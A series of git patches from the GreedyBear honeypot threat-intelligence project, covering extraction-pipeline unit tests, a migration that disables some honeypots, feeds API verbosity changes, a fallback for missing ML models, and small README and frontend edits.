+    @patch("greedybear.cronjobs.extraction.pipeline.IocRepository")
+    @patch("greedybear.cronjobs.extraction.pipeline.ElasticRepository")
+    def test_returns_extraction_interval_when_not_empty(self, mock_elastic, mock_ioc, mock_sensor):
+        """Should return EXTRACTION_INTERVAL for subsequent runs."""
+        from greedybear.cronjobs.extraction.pipeline import ExtractionPipeline
+
+        pipeline = ExtractionPipeline()
+        pipeline.ioc_repo.is_empty.return_value = False
+
+        result = pipeline._minutes_back_to_lookup
+
+        self.assertEqual(result, 5)
+
+    @patch("greedybear.cronjobs.extraction.pipeline.LEGACY_EXTRACTION", True)
+    @patch("greedybear.cronjobs.extraction.pipeline.EXTRACTION_INTERVAL", 5)
+    @patch("greedybear.cronjobs.extraction.pipeline.SensorRepository")
+    @patch("greedybear.cronjobs.extraction.pipeline.IocRepository")
+    @patch("greedybear.cronjobs.extraction.pipeline.ElasticRepository")
+    def test_returns_11_for_legacy_extraction(self, mock_elastic, mock_ioc, mock_sensor):
+        """Should return 11 when LEGACY_EXTRACTION is enabled."""
+        from greedybear.cronjobs.extraction.pipeline import ExtractionPipeline
+
+        pipeline = ExtractionPipeline()
+        pipeline.ioc_repo.is_empty.return_value = False
+
+        result = pipeline._minutes_back_to_lookup
+
+        self.assertEqual(result, 11)
+
+
+class TestExecuteHitGrouping(ExtractionPipelineTestCase):
+    """Tests for hit grouping logic in execute()."""
+
+    @patch("greedybear.cronjobs.extraction.pipeline.UpdateScores")
+    @patch("greedybear.cronjobs.extraction.pipeline.ExtractionStrategyFactory")
+    def test_skips_hits_without_src_ip(self, mock_factory, mock_scores):
+        """Hits without src_ip should be skipped."""
+        pipeline = self._create_pipeline_with_mocks()
+        pipeline.elastic_repo.search.return_value = [
+            MockElasticHit({"type": "Cowrie"}),  # missing src_ip
+            MockElasticHit({"src_ip": "", "type": "Cowrie"}),  # empty src_ip
+            MockElasticHit({"src_ip": "   ", "type": "Cowrie"}),  # whitespace-only src_ip
+        ]
+        pipeline.ioc_repo.is_empty.return_value = False
+
+        result = pipeline.execute()
+
+        self.assertEqual(result, 0)
+        mock_factory.return_value.get_strategy.assert_not_called()
+
+    @patch("greedybear.cronjobs.extraction.pipeline.UpdateScores")
+    @patch("greedybear.cronjobs.extraction.pipeline.ExtractionStrategyFactory")
+    def test_skips_hits_without_type(self, mock_factory, mock_scores):
+        """Hits without type (honeypot) should be skipped."""
+        pipeline = self._create_pipeline_with_mocks()
+        pipeline.elastic_repo.search.return_value = [
+            MockElasticHit({"src_ip": "1.2.3.4"}),  # missing type
+            MockElasticHit({"src_ip": "1.2.3.4", "type": ""}),  # empty type
+            MockElasticHit({"src_ip": "1.2.3.4", "type": "   "}),  # whitespace-only type
+        ]
+        pipeline.ioc_repo.is_empty.return_value = False
+
+        result = pipeline.execute()
+
+        self.assertEqual(result, 0)
+        mock_factory.return_value.get_strategy.assert_not_called()
+
+    @patch("greedybear.cronjobs.extraction.pipeline.LEGACY_EXTRACTION", False)
+    @patch("greedybear.cronjobs.extraction.pipeline.EXTRACTION_INTERVAL", 10)
+    @patch("greedybear.cronjobs.extraction.pipeline.UpdateScores")
+    @patch("greedybear.cronjobs.extraction.pipeline.ExtractionStrategyFactory")
+    def test_extracts_sensor_from_hits(self, mock_factory, mock_scores):
+        """
+        Should extract and register sensors from t-pot_ip_ext field.
+        Also verifies correct time window is passed to search().
+        """
+        pipeline = self._create_pipeline_with_mocks()
+        pipeline.elastic_repo.search.return_value = [
+            MockElasticHit({"src_ip": "1.2.3.4", "type": "Cowrie", "t-pot_ip_ext": "10.0.0.1"}),
+        ]
+        pipeline.ioc_repo.is_empty.return_value = False
+        pipeline.ioc_repo.is_ready_for_extraction.return_value = False  # Skip strategy for this test
+
+        pipeline.execute()
+
+        pipeline.sensor_repo.add_sensor.assert_called_once_with("10.0.0.1")
+        pipeline.elastic_repo.search.assert_called_once_with(10)
+
+    @patch("greedybear.cronjobs.extraction.pipeline.UpdateScores")
+    @patch("greedybear.cronjobs.extraction.pipeline.ExtractionStrategyFactory")
+    def test_groups_hits_by_honeypot_type(self, mock_factory, mock_scores):
+        """Hits should be grouped by honeypot type before extraction."""
+        pipeline = self._create_pipeline_with_mocks()
+        pipeline.elastic_repo.search.return_value = [
+            MockElasticHit({"src_ip": "1.2.3.4", "type": "Cowrie"}),
+            MockElasticHit({"src_ip": "5.6.7.8", "type": "Cowrie"}),
+            MockElasticHit({"src_ip": "9.10.11.12", "type": "Log4pot"}),
+        ]
+        pipeline.ioc_repo.is_empty.return_value = False
+        pipeline.ioc_repo.is_ready_for_extraction.return_value = True
+
+        mock_strategy = MagicMock()
+        mock_strategy.ioc_records = []
+        mock_factory.return_value.get_strategy.return_value = mock_strategy
+
+        pipeline.execute()
+
+        # Should be called for both honeypot types
+        self.assertEqual(mock_factory.return_value.get_strategy.call_count, 2)
+
+        # Verify strategy is called with correct honeypot types
+        calls = mock_factory.return_value.get_strategy.call_args_list
+        honeypot_names = {call[0][0] for call in calls}
+        self.assertEqual(honeypot_names, {"Cowrie", "Log4pot"})
+
+        # Verify extract_from_hits is called twice
+        self.assertEqual(mock_strategy.extract_from_hits.call_count, 2)
+
+        # Verify each strategy received correct number of hits
+        extraction_calls = mock_strategy.extract_from_hits.call_args_list
+        hits_counts = sorted([len(call[0][0]) for call in extraction_calls])
+        self.assertEqual(hits_counts, [1, 2])  # 1 Log4pot hit, 2 Cowrie hits
+
+
+class TestExecuteStrategySelection(ExtractionPipelineTestCase):
+    """Tests for strategy selection and execution in execute()."""
+
+    @patch("greedybear.cronjobs.extraction.pipeline.UpdateScores")
+    @patch("greedybear.cronjobs.extraction.pipeline.ExtractionStrategyFactory")
+    def test_skips_honeypot_not_ready_for_extraction(self, mock_factory, mock_scores):
+        """Should skip honeypots that are not ready for extraction."""
+        pipeline = self._create_pipeline_with_mocks()
+        pipeline.elastic_repo.search.return_value = [
+            MockElasticHit({"src_ip": "1.2.3.4", "type": "DisabledHoneypot"}),
+        ]
+        pipeline.ioc_repo.is_empty.return_value = False
+        pipeline.ioc_repo.is_ready_for_extraction.return_value = False
+
+        result = pipeline.execute()
+
+        self.assertEqual(result, 0)
+        mock_factory.return_value.get_strategy.assert_not_called()
+
+    @patch("greedybear.cronjobs.extraction.pipeline.UpdateScores")
+    @patch("greedybear.cronjobs.extraction.pipeline.ExtractionStrategyFactory")
+    def test_calls_extract_from_hits_on_strategy(self, mock_factory, mock_scores):
+        """Should call extract_from_hits on the selected strategy."""
+        pipeline = self._create_pipeline_with_mocks()
+        hit_data = {"src_ip": "1.2.3.4", "type": "Cowrie", "session": "abc123"}
+        pipeline.elastic_repo.search.return_value = [MockElasticHit(hit_data)]
+        pipeline.ioc_repo.is_empty.return_value = False
+        pipeline.ioc_repo.is_ready_for_extraction.return_value = True
+
+        mock_strategy = MagicMock()
+        mock_strategy.ioc_records = []
+        mock_factory.return_value.get_strategy.return_value = mock_strategy
+
+        pipeline.execute()
+
+        mock_strategy.extract_from_hits.assert_called_once()
+        # Verify the hits passed contain our data
+        call_args = mock_strategy.extract_from_hits.call_args[0][0]
+        self.assertEqual(len(call_args), 1)
+        self.assertEqual(call_args[0]["src_ip"], "1.2.3.4")
+
+    @patch("greedybear.cronjobs.extraction.pipeline.UpdateScores")
+    @patch("greedybear.cronjobs.extraction.pipeline.ExtractionStrategyFactory")
+    def test_collects_ioc_records_from_strategies(self, mock_factory, mock_scores):
+        """Should collect IOC records from all strategies."""
+        pipeline = self._create_pipeline_with_mocks()
+        pipeline.elastic_repo.search.return_value = [
+            MockElasticHit({"src_ip": "1.2.3.4", "type": "Cowrie"}),
+        ]
+        pipeline.ioc_repo.is_empty.return_value = False
+        pipeline.ioc_repo.is_ready_for_extraction.return_value = True
+
+        mock_ioc = self._create_mock_ioc("1.2.3.4")
+        mock_strategy = MagicMock()
+        mock_strategy.ioc_records = [mock_ioc]
+        mock_factory.return_value.get_strategy.return_value = mock_strategy
+
+        result = pipeline.execute()
+
+        self.assertEqual(result, 1)
+
+    @patch("greedybear.cronjobs.extraction.pipeline.UpdateScores")
+    @patch("greedybear.cronjobs.extraction.pipeline.ExtractionStrategyFactory")
+    def test_accumulates_iocs_from_multiple_strategies(self, mock_factory, mock_scores):
+        """Should accumulate IOC records from multiple successful strategies."""
+        pipeline = self._create_pipeline_with_mocks()
+        pipeline.elastic_repo.search.return_value = [
+            MockElasticHit({"src_ip": "1.2.3.4", "type": "Cowrie"}),
+            MockElasticHit({"src_ip": "5.6.7.8", "type": "Log4pot"}),
+        ]
+        pipeline.ioc_repo.is_empty.return_value = False
+        pipeline.ioc_repo.is_ready_for_extraction.return_value = True
+
+        # Mock two different strategies
+        mock_cowrie_strategy = MagicMock()
+        mock_cowrie_ioc = self._create_mock_ioc("1.2.3.4")
+        mock_cowrie_strategy.ioc_records = [mock_cowrie_ioc]
+
+        mock_log4pot_strategy = MagicMock()
+        mock_log4pot_ioc = self._create_mock_ioc("5.6.7.8")
+        mock_log4pot_strategy.ioc_records = [mock_log4pot_ioc]
+
+        # Return strategies in sequence
+        mock_factory.return_value.get_strategy.side_effect = [mock_cowrie_strategy, mock_log4pot_strategy]
+
+        result = pipeline.execute()
+
+        # Should return total count (1 + 1 = 2)
+        self.assertEqual(result, 2)
+
+        # Verify both strategies were executed
+        self.assertEqual(mock_cowrie_strategy.extract_from_hits.call_count, 1)
+        self.assertEqual(mock_log4pot_strategy.extract_from_hits.call_count, 1)
+
+        # Verify data flow to scoring
+        mock_scores.return_value.score_only.assert_called_once()
+        collected_iocs = mock_scores.return_value.score_only.call_args[0][0]
+        self.assertEqual(len(collected_iocs), 2)
+        self.assertIn(mock_cowrie_ioc, collected_iocs)
+        self.assertIn(mock_log4pot_ioc, collected_iocs)
+
+    @patch("greedybear.cronjobs.extraction.pipeline.UpdateScores")
+    @patch("greedybear.cronjobs.extraction.pipeline.ExtractionStrategyFactory")
+    def test_handles_strategy_exception_gracefully(self, mock_factory, mock_scores):
+        """Strategy exceptions should be caught and logged, not crash pipeline."""
+        pipeline = self._create_pipeline_with_mocks()
+        pipeline.log = MagicMock()
+
+        pipeline.elastic_repo.search.return_value = [
+            MockElasticHit({"src_ip": "1.2.3.4", "type": "Cowrie"}),
+            MockElasticHit({"src_ip": "5.6.7.8", "type": "Log4pot"}),
+        ]
+        pipeline.ioc_repo.is_empty.return_value = False
+        pipeline.ioc_repo.is_ready_for_extraction.return_value = True
+
+        # First strategy raises exception, second succeeds
+        mock_failing_strategy = MagicMock()
+        mock_failing_strategy.extract_from_hits.side_effect = Exception("Test error")
+
+        mock_success_strategy = MagicMock()
+        mock_success_strategy.ioc_records = [self._create_mock_ioc("5.6.7.8")]
+
+        mock_factory.return_value.get_strategy.side_effect = [mock_failing_strategy, mock_success_strategy]
+
+        # Should not raise, should continue with next strategy
+        result = pipeline.execute()
+
+        self.assertEqual(result, 1)
+        pipeline.log.error.assert_called_once()
+
+
+class TestExecuteScoring(ExtractionPipelineTestCase):
+    """Tests for scoring logic in execute()."""
+
+    @patch("greedybear.cronjobs.extraction.pipeline.UpdateScores")
+    @patch("greedybear.cronjobs.extraction.pipeline.ExtractionStrategyFactory")
+    def test_updates_scores_when_iocs_extracted(self, mock_factory, mock_scores):
+        """Should call UpdateScores.score_only when IOCs are extracted."""
+        pipeline = self._create_pipeline_with_mocks()
+        pipeline.elastic_repo.search.return_value = [
+            MockElasticHit({"src_ip": "1.2.3.4", "type": "Cowrie"}),
+        ]
+        pipeline.ioc_repo.is_empty.return_value = False
+        pipeline.ioc_repo.is_ready_for_extraction.return_value = True
+
+        mock_ioc = self._create_mock_ioc("1.2.3.4")
+        mock_strategy = MagicMock()
+        mock_strategy.ioc_records = [mock_ioc]
+        mock_factory.return_value.get_strategy.return_value = mock_strategy
+
+        pipeline.execute()
+
+        mock_scores.return_value.score_only.assert_called_once()
+        call_args = mock_scores.return_value.score_only.call_args[0][0]
+        self.assertEqual(len(call_args), 1)
+
+    @patch("greedybear.cronjobs.extraction.pipeline.UpdateScores")
+    @patch("greedybear.cronjobs.extraction.pipeline.ExtractionStrategyFactory")
+    def test_skips_scoring_when_no_iocs(self, mock_factory, mock_scores):
+        """Should not call UpdateScores when no IOCs are extracted."""
+        pipeline = self._create_pipeline_with_mocks()
+        pipeline.elastic_repo.search.return_value = []
+        pipeline.ioc_repo.is_empty.return_value = False
+
+        pipeline.execute()
+
+        mock_scores.return_value.score_only.assert_not_called()
+
+
+class TestExecuteEmptyResponse(ExtractionPipelineTestCase):
+    """Tests for empty Elasticsearch response handling."""
+
+    @patch("greedybear.cronjobs.extraction.pipeline.UpdateScores")
+    @patch("greedybear.cronjobs.extraction.pipeline.ExtractionStrategyFactory")
+    def test_handles_empty_search_result(self, mock_factory, mock_scores):
+        """Should handle empty Elasticsearch response gracefully."""
+        pipeline = self._create_pipeline_with_mocks()
+        pipeline.elastic_repo.search.return_value = []
+        pipeline.ioc_repo.is_empty.return_value = False
+
+        result = pipeline.execute()
+
+        self.assertEqual(result, 0)
+        mock_factory.return_value.get_strategy.assert_not_called()
+        mock_scores.return_value.score_only.assert_not_called()

From 3daf2469b1da387aaaeacc6bdabf2fefd8bdd9cf Mon Sep 17 00:00:00 2001
From: Sumit Das <codebysumitdev@gmail.com>
Date: Wed, 28 Jan 2026 17:45:47 +0530
Subject: [PATCH 65/75] feat: Disable additional honeypots (Closes #738) (#739)

- Add migration to disable Fatt, P0f, ssh-dss, ssh-ed25519 honeypots
- Follows pattern from #631
- Uses get_or_create to ensure idempotency

Co-authored-by: SUMIT DAS <sumitdas@SUMITs-MacBook-Air.local>
---
 .../0033_disable_additional_honeypots.py      | 35 +++++++++++++++++++
 1 file changed, 35 insertions(+)
 create mode 100644 greedybear/migrations/0033_disable_additional_honeypots.py

diff --git a/greedybear/migrations/0033_disable_additional_honeypots.py b/greedybear/migrations/0033_disable_additional_honeypots.py
new file mode 100644
index 00000000..f0b19242
--- /dev/null
+++ b/greedybear/migrations/0033_disable_additional_honeypots.py
@@ -0,0 +1,35 @@
+from django.db import migrations
+
+
+def disable_additional_honeypots(apps, schema_editor):
+    """
+    Disable additional honeypots: Fatt, P0f, ssh-dss, ssh-ed25519
+    """
+    GeneralHoneypot = apps.get_model("greedybear", "GeneralHoneypot")
+
+    unwanted = [
+        "Fatt",
+        "P0f",
+        "ssh-dss",
+        "ssh-ed25519",
+    ]
+
+    for name in unwanted:
+        GeneralHoneypot.objects.get_or_create(
+            name=name,
+            defaults={"active": False},
+        )
+
+
+class Migration(migrations.Migration):
+
+    dependencies = [
+        ("greedybear", "0032_torexitnode"),
+    ]
+
+    operations = [
+        migrations.RunPython(
+            disable_additional_honeypots,
+            reverse_code=migrations.RunPython.noop,
+        ),
+    ]

From eed72cbd7d52b9b407fd5dd85f900458a568ac25 Mon Sep 17 00:00:00 2001
From: Sumit Das <codebysumitdev@gmail.com>
Date: Wed, 28 Jan 2026 18:57:18 +0530
Subject: [PATCH 66/75] fix: Respect verbose parameter in feeds API response
 (Fixes #741) (#743)

- Split required_fields into base_fields and verbose_fields
- Base fields always returned (value, first_seen, attack_count, etc.)
- Verbose fields only returned when verbose=true:
  - days_seen
  - destination_ports
  - honeypots
  - firehol_categories
- destination_port_count only calculated when destination_ports exists

This ensures /api/feeds endpoints return concise responses by default,
with verbose data only when explicitly requested via verbose=true parameter.

Co-authored-by: SUMIT DAS <sumitdas@SUMITs-MacBook-Air.local>
---
 api/views/utils.py | 33 +++++++++++++++++++++++----------
 1 file changed, 23 insertions(+), 10 deletions(-)

diff --git a/api/views/utils.py b/api/views/utils.py
index 1bd77d89..52c19696 100644
--- a/api/views/utils.py
+++ b/api/views/utils.py
@@ -205,13 +205,11 @@ def feeds_response(iocs, feed_params, valid_feed_types, dict_only=False, verbose
     Format the IOC data into the requested format (e.g., JSON, CSV, TXT).
 
     Args:
-        request: The incoming request object.
         iocs (QuerySet): The filtered queryset of IOC data.
-        feed_type (str): Type of feed (e.g., log4j, cowrie, etc.).
+        feed_params (FeedRequestParams): Request parameters including format.
         valid_feed_types (frozenset): The set of all valid feed types.
-        format_ (str): Desired format of the response (e.g., json, csv, txt).
         dict_only (bool): Return IOC dictionary instead of Response object.
-        verbose (bool): Include IOC properties that may contain a lot of data.
+        verbose (bool): Include verbose fields (days_seen, destination_ports, honeypots, firehol_categories).
 
     Returns:
         Response: The HTTP response containing formatted IOC data.
@@ -235,7 +233,9 @@ def feeds_response(iocs, feed_params, valid_feed_types, dict_only=False, verbose
             )
         case "json":
             json_list = []
-            required_fields = {
+
+            # Base fields always returned
+            base_fields = {
                 "value",
                 "first_seen",
                 "last_seen",
@@ -244,16 +244,23 @@ def feeds_response(iocs, feed_params, valid_feed_types, dict_only=False, verbose
                 "scanner",
                 "payload_request",
                 "ip_reputation",
-                "firehol_categories",
                 "asn",
-                "destination_ports",
                 "login_attempts",
-                "honeypots",
-                "days_seen",
                 "recurrence_probability",
                 "expected_interactions",
+                "honeypots",  # Always needed to calculate feed_type
+                "destination_ports",  # Always needed to calculate destination_port_count
+            }
+
+            # Additional verbose fields
+            verbose_only_fields = {
+                "days_seen",
+                "firehol_categories",
             }
 
+            # Fetch fields from database (always include honeypots and destination_ports)
+            required_fields = base_fields | verbose_only_fields if verbose else base_fields
+
             # Collect values; `honeypots` will contain the list of associated honeypot names
             iocs = (ioc_as_dict(ioc, required_fields) for ioc in iocs) if isinstance(iocs, list) else iocs.values(*required_fields)
             for ioc in iocs:
@@ -263,9 +270,15 @@ def feeds_response(iocs, feed_params, valid_feed_types, dict_only=False, verbose
                     "first_seen": ioc["first_seen"].strftime("%Y-%m-%d"),
                     "last_seen": ioc["last_seen"].strftime("%Y-%m-%d"),
                     "feed_type": ioc_feed_type,
-                    "destination_port_count": len(ioc["destination_ports"]),
+                    "destination_port_count": len(ioc.get("destination_ports", [])),
                 }
 
+                # Remove verbose-only fields from response when not in verbose mode
+                if not verbose:
+                    # Remove honeypots and destination_ports arrays from response
+                    data_.pop("honeypots", None)
+                    data_.pop("destination_ports", None)
+
                 # Skip validation - data_ is constructed internally and matches the API contract
                 json_list.append(data_)
 

From 763583c29b8d4dbb77956b2a61a7a05194e16e4c Mon Sep 17 00:00:00 2001
From: Sumit Das <codebysumitdev@gmail.com>
Date: Thu, 29 Jan 2026 12:38:38 +0530
Subject: [PATCH 67/75] fix: Remove redundant honeypots field from feeds API
 response (Fixes #744) (#745)

- honeypots was redundant with feed_type (same data, different casing)
- Still fetch honeypots from DB to calculate feed_type
- Remove honeypots from response in both verbose and non-verbose modes
- Users only see feed_type which has all necessary information

Co-authored-by: SUMIT DAS <sumitdas@SUMITs-MacBook-Air.local>
---
 api/views/utils.py | 6 ++++--
 1 file changed, 4 insertions(+), 2 deletions(-)

diff --git a/api/views/utils.py b/api/views/utils.py
index 52c19696..bc4742c8 100644
--- a/api/views/utils.py
+++ b/api/views/utils.py
@@ -275,10 +275,12 @@ def feeds_response(iocs, feed_params, valid_feed_types, dict_only=False, verbose
 
                 # Remove verbose-only fields from response when not in verbose mode
                 if not verbose:
-                    # Remove honeypots and destination_ports arrays from response
-                    data_.pop("honeypots", None)
+                    # Remove destination_ports array from response
                     data_.pop("destination_ports", None)
 
+                # Always remove honeypots field as it's redundant with feed_type
+                data_.pop("honeypots", None)
+
                 # Skip validation - data_ is constructed internally and matches the API contract
                 json_list.append(data_)
 

From 38915c8b10213ccf5f28684b32cebe308e251d15 Mon Sep 17 00:00:00 2001
From: tim <46972822+regulartim@users.noreply.github.com>
Date: Thu, 29 Jan 2026 11:42:15 +0100
Subject: [PATCH 68/75] Handle missing ML models gracefully during extraction.
 Closes #748 (#749)

* add check for model availability an log warning if not

* add test case

* fix format
---
 greedybear/cronjobs/scoring/ml_model.py | 15 +++++++++++++++
 tests/test_rf_models.py                 | 23 ++++++++++++++++++++++-
 2 files changed, 37 insertions(+), 1 deletion(-)

diff --git a/greedybear/cronjobs/scoring/ml_model.py b/greedybear/cronjobs/scoring/ml_model.py
index 641a7417..aa6b2396 100644
--- a/greedybear/cronjobs/scoring/ml_model.py
+++ b/greedybear/cronjobs/scoring/ml_model.py
@@ -93,6 +93,14 @@ def add_missing_features(self, df: pd.DataFrame) -> pd.DataFrame:
             df[feature] = 0
         return df[train_features]
 
+    @property
+    def is_available(self) -> bool:
+        """Check whether the model is already loaded or its file exists on disk."""
+        if "model" in self.__dict__:
+            return True
+        storage = FileSystemStorage(location=ML_MODEL_DIRECTORY)
+        return storage.exists(self.file_name)
+
     def score(self, df: pd.DataFrame) -> pd.DataFrame:
         """
         Score input data using the trained model.
@@ -112,6 +120,13 @@ def score(self, df: pd.DataFrame) -> pd.DataFrame:
             ValueError: If required features are missing from input
         """
         self.log.info(f"calculate {self.score_name} with {self.name}")
+
+        if not self.is_available:
+            self.log.warning(f"no trained model available for {self.name}, skipping scoring")
+            result_df = df.copy()
+            result_df[self.score_name] = 0
+            return result_df
+
         missing_features = set(self.features) - set(df.columns)
         if missing_features:
             raise ValueError(f"Missing required features: {missing_features}")
diff --git a/tests/test_rf_models.py b/tests/test_rf_models.py
index 102517f8..95fbe2e3 100644
--- a/tests/test_rf_models.py
+++ b/tests/test_rf_models.py
@@ -1,4 +1,4 @@
-from unittest.mock import Mock
+from unittest.mock import Mock, patch
 
 import numpy as np
 import pandas as pd
@@ -115,3 +115,24 @@ def test_negative_predictions(self):
 
         expected = np.array([0, 5, 0, 0, 2])
         np.testing.assert_array_equal(predictions, expected)
+
+
+class TestModelUnavailable(CustomTestCase):
+    """Test that scoring handles missing model files gracefully."""
+
+    class MockRFClassifier(TestClassifier.MockRFModel, Classifier):
+        def __init__(self):
+            super().__init__("Mock Random Forest Classifier", "mock_score")
+
+        @property
+        def untrained_model(self):
+            return Mock()
+
+    @patch("greedybear.cronjobs.scoring.ml_model.FileSystemStorage")
+    def test_score_skips_when_model_unavailable(self, mock_storage_cls):
+        """When the model file does not exist, score() should return a DataFrame with the score column set to 0."""
+        mock_storage_cls.return_value.exists.return_value = False
+        classifier = self.MockRFClassifier()
+        df = classifier.score(SAMPLE_DATA)
+        self.assertIn("mock_score", df.columns)
+        self.assertTrue((df["mock_score"] == 0).all())

From c0558dd0c5d554345f6716b3e6ba58453b896ccb Mon Sep 17 00:00:00 2001
From: Matteo Lodi <30625432+mlodic@users.noreply.github.com>
Date: Thu, 29 Jan 2026 14:50:29 +0100
Subject: [PATCH 69/75] added note on readme

---
 README.md | 2 +-
 1 file changed, 1 insertion(+), 1 deletion(-)

diff --git a/README.md b/README.md
index 9b25f59e..acb57d4c 100644
--- a/README.md
+++ b/README.md
@@ -64,6 +64,6 @@ In 2022 we joined the official [DigitalOcean Open Source Program](https://www.di
 This project was started as a personal Christmas project by [Matteo Lodi](https://twitter.com/matte_lodi) in 2021.
 
 Special thanks to:
-* [Tim Leonhard](https://github.com/regulartim) for having greatly improved the project and added Machine Learning Models during his master thesis.
+* [Tim Leonhard](https://github.com/regulartim) for having greatly improved the project and added Machine Learning Models during his master thesis. He's the actual Principal Mantainer.
 * [Martina Carella](https://github.com/carellamartina) for having created the GUI during her master thesis.
 * [Daniele Rosetti](https://github.com/drosetti) for helping maintaining the Frontend.

From 69b48bf79ff9e57ff1d4d8dcc475e322fab1c2c2 Mon Sep 17 00:00:00 2001
From: tim <46972822+regulartim@users.noreply.github.com>
Date: Thu, 29 Jan 2026 14:55:32 +0100
Subject: [PATCH 70/75] Add link to blog post for v3 release (#751)

* add v3 announcement

* change version number format to match other posts
---
 frontend/src/components/home/Home.jsx | 6 ++++++
 1 file changed, 6 insertions(+)

diff --git a/frontend/src/components/home/Home.jsx b/frontend/src/components/home/Home.jsx
index 29671007..8ea6cf00 100644
--- a/frontend/src/components/home/Home.jsx
+++ b/frontend/src/components/home/Home.jsx
@@ -11,6 +11,12 @@ const versionText = VERSION;
 // const versionText = "v1.0.0";
 const logoBgImg = `url('${PUBLIC_URL}/greedybear.png')`;
 const blogPosts = [
+  {
+    title: "GreedyBear version 3.0 coming",
+    subText: "With many new features!",
+    date: "29th January 2026",
+    link: "https://intelowlproject.github.io/blogs/greedybear_v3_release",
+  },
   {
     title: "GreedyBear version 2.0 released",
     subText: "Upgrade from 1.x requires manual intervention",

From a5e95cb95b48cd88d37272989687d742a26a1dc9 Mon Sep 17 00:00:00 2001
From: Krishna Awasthi <140143710+opbot-xd@users.noreply.github.com>
Date: Thu, 29 Jan 2026 19:51:55 +0530
Subject: [PATCH 71/75] Strategy-specific E2E tests and edge cases for
 ExtractionPipeline. Closes #636 (#740)

* Add strategy-specific E2E tests and edge cases for ExtractionPipeline. Closes #636

* fix: address PR feedback - improve test assertions and remove unused mocks

- Replace weak assertGreaterEqual(result, 0) with specific mock.call_count assertions
- Fix E2E tests to use proper ExtractionStrategyFactory mocking pattern
- Remove unnecessary UpdateScores patch decorators from factory tests
- Remove unused mock_scores parameters

* refactor: split pipeline tests and use real factory/strategies in E2E

- Split monolithic test file into 4 focused files
- E2E tests now use real ExtractionStrategyFactory and strategies
- Only mock repositories at the boundary
- Tests actual integration path as it runs in production

* test: add back edge cases for pipeline tests

- test_honeypot_skipped_when_not_ready (grouping file)
- test_strategy_returns_empty_ioc_records (E2E file)
- test_partial_strategy_success (E2E file)
- test_large_batch_of_hits (E2E file)

* Add IOC content verification tests and reorganize test files

- Add TestIocContentVerification class with 3 tests for IOC content verification
- Move E2ETestCase class to tests/__init__.py for shared usage (reviewer feedback)
- Split edge cases into test_extraction_pipeline_edge_cases.py

Edge cases now clearly document when mocking is required:
- test_partial_strategy_success: Mocks factory (needs to force exception)
- test_large_batch_of_hits_with_real_strategy: Uses REAL strategy

Tests added:
- test_cowrie_ioc_content_verified: Verifies IOC has correct IP
- test_multiple_honeypots_ioc_content_verified: Verifies multiple IOCs
- test_ioc_scanner_field_contains_honeypot_type: Verifies scanner field

Addresses reviewer feedback to:
1. Verify actual IOC content, not just count
2. Move shared test infrastructure to tests/__init__.py
3. Keep test files focused and manageable in size
4. Use real strategies where possible in tests

* Fix misleading comment in large batch test

* test: explicitly assert IOC extraction count before verifying scoring call in e2e pipeline test
---
 tests/__init__.py                             |  30 ++
 .../cronjobs/test_extraction_pipeline.py      | 380 -------------
 .../cronjobs/test_extraction_pipeline_e2e.py  | 506 ++++++++++++++++++
 .../test_extraction_pipeline_edge_cases.py    | 102 ++++
 .../test_extraction_pipeline_factory.py       |  87 +++
 .../test_extraction_pipeline_grouping.py      | 236 ++++++++
 .../cronjobs/test_extraction_pipeline_init.py |  80 +++
 7 files changed, 1041 insertions(+), 380 deletions(-)
 delete mode 100644 tests/greedybear/cronjobs/test_extraction_pipeline.py
 create mode 100644 tests/greedybear/cronjobs/test_extraction_pipeline_e2e.py
 create mode 100644 tests/greedybear/cronjobs/test_extraction_pipeline_edge_cases.py
 create mode 100644 tests/greedybear/cronjobs/test_extraction_pipeline_factory.py
 create mode 100644 tests/greedybear/cronjobs/test_extraction_pipeline_grouping.py
 create mode 100644 tests/greedybear/cronjobs/test_extraction_pipeline_init.py

diff --git a/tests/__init__.py b/tests/__init__.py
index 186afdca..fdf715f9 100644
--- a/tests/__init__.py
+++ b/tests/__init__.py
@@ -245,3 +245,33 @@ def get(self, key, default=None):
 
     def to_dict(self):
         return self._data.copy()
+
+
+class E2ETestCase(ExtractionTestCase):
+    """Base test case for E2E pipeline tests with real strategies.
+
+    This base class provides helpers for creating pipelines with mocked
+    repositories but REAL strategies, enabling true integration testing.
+    """
+
+    def _create_pipeline_with_real_factory(self):
+        """
+        Create a pipeline with mocked repositories but REAL factory/strategies.
+
+        This approach tests the actual integration:
+        Pipeline → real Factory → real Strategy → IOC extraction
+
+        Returns:
+            ExtractionPipeline: Pipeline with mocked repos, real strategies.
+        """
+        from unittest.mock import patch
+
+        with (
+            patch("greedybear.cronjobs.extraction.pipeline.SensorRepository"),
+            patch("greedybear.cronjobs.extraction.pipeline.IocRepository"),
+            patch("greedybear.cronjobs.extraction.pipeline.ElasticRepository"),
+        ):
+            from greedybear.cronjobs.extraction.pipeline import ExtractionPipeline
+
+            pipeline = ExtractionPipeline()
+            return pipeline
diff --git a/tests/greedybear/cronjobs/test_extraction_pipeline.py b/tests/greedybear/cronjobs/test_extraction_pipeline.py
deleted file mode 100644
index bcd9aaea..00000000
--- a/tests/greedybear/cronjobs/test_extraction_pipeline.py
+++ /dev/null
@@ -1,380 +0,0 @@
-# This file is a part of GreedyBear https://github.com/honeynet/GreedyBear
-# See the file 'LICENSE' for copying permission.
-"""
-End-to-end tests for the ExtractionPipeline class.
-
-Tests the complete extraction workflow from Elasticsearch hits
-through strategy selection, IOC extraction, and scoring.
-"""
-
-from unittest.mock import MagicMock, patch
-
-from tests import ExtractionTestCase, MockElasticHit
-
-
-class ExtractionPipelineTestCase(ExtractionTestCase):
-    """Base test case for extraction pipeline tests, reusing common extraction helpers."""
-
-    def _create_pipeline_with_mocks(self):
-        """Helper to create a pipeline with mocked dependencies."""
-        with (
-            patch("greedybear.cronjobs.extraction.pipeline.SensorRepository"),
-            patch("greedybear.cronjobs.extraction.pipeline.IocRepository"),
-            patch("greedybear.cronjobs.extraction.pipeline.ElasticRepository"),
-        ):
-            from greedybear.cronjobs.extraction.pipeline import ExtractionPipeline
-
-            pipeline = ExtractionPipeline()
-            return pipeline
-
-
-class TestExtractionPipelineInit(ExtractionPipelineTestCase):
-    """Tests for ExtractionPipeline initialization."""
-
-    @patch("greedybear.cronjobs.extraction.pipeline.SensorRepository")
-    @patch("greedybear.cronjobs.extraction.pipeline.IocRepository")
-    @patch("greedybear.cronjobs.extraction.pipeline.ElasticRepository")
-    def test_initializes_repositories(self, mock_elastic, mock_ioc, mock_sensor):
-        """Pipeline should initialize all required repositories."""
